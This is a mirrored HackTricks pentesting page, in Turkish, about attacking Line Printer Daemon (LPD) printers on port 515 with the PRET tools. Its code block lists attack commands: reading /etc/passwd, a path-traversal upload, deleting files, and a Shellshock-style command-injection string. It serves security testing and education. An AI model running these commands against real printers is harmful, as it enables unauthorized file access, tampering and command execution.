maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

31 lines
2.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{{#include ../banners/hacktricks-training.md}}
### **LPD Protokolüne Giriş**
1980'lerde, **Line Printer Daemon (LPD) protokolü** Berkeley Unix'te geliştirilmiş ve daha sonra RFC1179 ile resmileştirilmiştir. Bu protokol, `lpr` komutu aracılığıyla etkileşimlere olanak tanıyan 515/tcp portu üzerinden çalışır. LPD aracılığıyla yazdırmanın özü, **iş detaylarını ve kullanıcıyı belirtmek için** bir **kontrol dosyası** ile **yazdırma bilgilerini içeren** bir **veri dosyası** göndermeyi içerir. Kontrol dosyası, veri dosyası için **çeşitli dosya formatlarının** seçilmesine olanak tanırken, bu dosyaların işlenmesi belirli LPD uygulaması tarafından belirlenir. Unix benzeri sistemler için yaygın olarak bilinen bir uygulama **LPRng**'dir. Dikkate değer bir şekilde, LPD protokolü **kötü niyetli PostScript** veya **PJL yazdırma işleri** yürütmek için istismar edilebilir.
### **LPD Yazıcıları ile Etkileşim Araçları**
[**PRET**](https://github.com/RUB-NDS/PRET), LPD uyumlu yazıcılarla etkileşim kurmak için `lpdprint` ve `lpdtest` adlı iki temel aracı tanıtır ve bu araçlar, yazıcıda veri yazdırmaktan dosyaları indirme, yükleme veya silme gibi bir dizi eylemi gerçekleştirmek için basit bir yöntem sunar:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
**Yazıcı hackleme** alanını daha fazla keşfetmekle ilgilenen bireyler için kapsamlı bir kaynak burada bulunabilir: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).
# Shodan
- `port 515`
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink